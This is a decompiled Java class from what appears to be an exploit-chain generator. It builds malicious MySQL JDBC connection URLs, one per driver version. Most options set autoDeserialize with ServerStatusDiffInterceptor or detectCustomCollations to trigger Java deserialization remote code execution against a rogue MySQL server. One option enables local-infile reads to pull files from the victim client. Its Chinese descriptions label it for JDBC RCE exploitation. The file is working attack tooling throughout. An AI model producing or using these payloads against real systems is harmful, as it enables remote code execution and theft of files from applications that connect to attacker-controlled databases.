/*
 * Decompiled with CFR 0.152.
 */
package com.ar3h.chains.gadget.impl.common.jdbc;

import com.ar3h.chains.common.ContextTag;
import com.ar3h.chains.common.Gadget;
import com.ar3h.chains.common.GadgetChain;
import com.ar3h.chains.common.GadgetContext;
import com.ar3h.chains.common.annotations.GadgetAnnotation;
import com.ar3h.chains.common.annotations.GadgetTags;
import com.ar3h.chains.common.exception.ThrowsUtil;
import com.ar3h.chains.common.param.Choice;
import com.ar3h.chains.common.param.Param;
import com.ar3h.chains.common.param.ParamType;

@GadgetTags(tags={"MysqlJdbcUrl", "JdbcUrlChains", "END"})
@GadgetAnnotation(name="Mysql JDBC URL", description="\u9002\u7528\u4e8ejdbc rce\u573a\u666f\uff0cjdbc\u8f6c\u4e3aJava\u53cd\u5e8f\u5217\u5316", dependencies={"mysql-connector-java"}, priority=40)
public class MysqlJdbc
implements Gadget {
    @Param(name="Mysql Jdbc URL Payload \u7c7b\u578b", type=ParamType.Choice, choices={@Choice(value="read"), @Choice(value="detectCustomCollations_5.1.19-5.1.28"), @Choice(value="detectCustomCollations_5.1.29-5.1.48"), @Choice(value="detectCustomCollations_6.0.2-6.0.6"), @Choice(value="ServerStatusDiffInterceptor_5.1.11-5.x.xx"), @Choice(value="ServerStatusDiffInterceptor_6.x"), @Choice(value="ServerStatusDiffInterceptor_8.0.20")})
    public String type = "ServerStatusDiffInterceptor_5.1.11-5.x.xx";
    @Param(name="\u7528\u6237\u540d", description="\u901a\u5e38\u8fd9\u91cc\u7528\u6765\u7ed9mysql jdbc\u6f0f\u6d1e\u5229\u7528\u5de5\u5177\u4f20\u53c2\uff0c\u8f93\u51fa\u4e0d\u540c\u7684\u53cd\u5e8f\u5217\u5316Payload")
    public String user = "root";
    @Param(name="mysql ip:port", description="eg: 172.16.1.2:3306")
    public String host = "172.16.1.2:3306";
    public String driverClassName;

    public String getObject() {
        String jdbcUrl = null;
        switch (this.type) {
            case "read": {
                jdbcUrl = "jdbc:mysql://" + this.host + "/test?allowLoadLocalInfile=true&allowUrlInLocalInfile=true&allowLoadLocalInfileInPath=/&maxAllowedPacket=655360&user=" + this.user;
                this.driverClassName = "com.mysql.jdbc.Driver";
                break;
            }
            case "detectCustomCollations_5.1.19-5.1.28": {
                jdbcUrl = "jdbc:mysql://" + this.host + "/test?autoDeserialize=true&user=" + this.user;
                this.driverClassName = "com.mysql.jdbc.Driver";
                break;
            }
            case "detectCustomCollations_5.1.29-5.1.48": {
                jdbcUrl = "jdbc:mysql://" + this.host + "/test?detectCustomCollations=true&autoDeserialize=true&user=" + this.user;
                this.driverClassName = "com.mysql.jdbc.Driver";
                break;
            }
            case "detectCustomCollations_6.0.2-6.0.6": {
                jdbcUrl = "jdbc:mysql://" + this.host + "/test?detectCustomCollations=true&autoDeserialize=true&user=" + this.user;
                this.driverClassName = "com.mysql.cj.jdbc.Driver";
                break;
            }
            case "ServerStatusDiffInterceptor_5.1.11-5.x.xx": {
                jdbcUrl = "jdbc:mysql://" + this.host + "/test?autoDeserialize=true&statementInterceptors=com.mysql.jdbc.interceptors.ServerStatusDiffInterceptor&user=" + this.user;
                this.driverClassName = "com.mysql.jdbc.Driver";
                break;
            }
            case "ServerStatusDiffInterceptor_6.x": {
                jdbcUrl = "jdbc:mysql://" + this.host + "/test?autoDeserialize=true&statementInterceptors=com.mysql.cj.jdbc.interceptors.ServerStatusDiffInterceptor&user=" + this.user;
                this.driverClassName = "com.mysql.cj.jdbc.Driver";
                break;
            }
            case "ServerStatusDiffInterceptor_8.0.20": {
                jdbcUrl = "jdbc:mysql://" + this.host + "/test?autoDeserialize=true&queryInterceptors=com.mysql.cj.jdbc.interceptors.ServerStatusDiffInterceptor&user=" + this.user;
                this.driverClassName = "com.mysql.cj.jdbc.Driver";
                break;
            }
            default: {
                ThrowsUtil.throwGadgetException("type is not support: " + this.type);
            }
        }
        return jdbcUrl;
    }

    @Override
    public Object invoke(GadgetContext context, GadgetChain chain) throws Exception {
        String jdbcUrl = this.getObject();
        context.put(ContextTag.DRIVER_CLASS_NAME_KEY, this.driverClassName);
        return jdbcUrl;
    }
}

